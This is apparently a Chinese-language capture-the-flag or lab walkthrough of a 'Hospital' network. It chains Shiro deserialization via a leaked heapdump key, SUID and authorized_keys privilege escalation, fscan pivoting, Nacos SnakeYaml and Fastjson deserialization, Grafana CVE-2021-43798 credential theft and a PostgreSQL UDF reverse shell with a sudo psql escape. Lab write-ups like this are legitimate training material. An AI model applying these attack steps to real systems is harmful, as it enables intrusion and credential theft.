Hospital
graph LR;
A[ ] -->|HeapDump泄露,shiro反序列化| 立足点;
立足点-->|Nacos SnakeYaml反序列化| Nacos;
立足点-->|fastjson反序列化| 医院后台管理平台;
医院后台管理平台-->|Grafana任意文件读取,PostGreSql UDF|Grafana;
立足点
目标IP:39.101.202.79
usershell
PocScan http://39.101.202.79:8080 poc-yaml-spring-actuator-heapdump-file
在登陆页面发现rememberMe
字段的Cookie
,判断是shiro,于是去heapdump
文件里寻找shirokey
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES
写入内存马
获取到app
权限,SuperShell
上线
rootshell
find / -type f -perm -u=s 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
直接读取/root/flag/flag01.txt
获取权限的方式有很多,写计划任务,写/ect/passwd
或/etc/shadow
,写ssh
公钥
vim /root/.ssh/authorized_keys
:wq!
ssh连接,获得root
权限
横向移动
内网信息收集
ip a
查看网卡得到内网网段172.30.12.5/16
fscan -h 172.30.12.5/16
开扫
[*]172.30.12.6
[->]Server02
[->]172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=B6852E29CD0917D1A093BF96842EEE33
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=B6852E29CD0917D1A093BF96842EEE33 code:200 len:2005 title:医疗管理后台
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypas
Nacos
stowaway
开一条代理,nacos
是弱口令
SnakeYaml
反序列化
不出网,需要在立足点起一个web服务放jar
包,添加管理员账号
医院后台管理平台
172.30.12.236:22 open
172.30.12.236:8080 open
172.30.12.236:8009 open
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台
没弱口令,报错返回Fastjson
尝试打fastjson
直接是root
权限,发现新网段172.30.54.179/24
http://172.30.54.12:3000/login code:200 len:27909 title:Grafana
Grafana
把端口转发出来
CVE-2021-43798
,读取postgresql
的账号密码
2024/02/01 17:30:59 type:[postgres] name:[PostgreSQL] url:[localhost:5432] user:[postgres] password[Postgres@123] database:[postgres] basic_auth_user:[] basic_auth_password:[]
https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
反弹shell
https://gtfobins.github.io/gtfobins/psql/
sudo -l
sudo pgsql -U postgres
\?
!/bin/sh
拿到root权限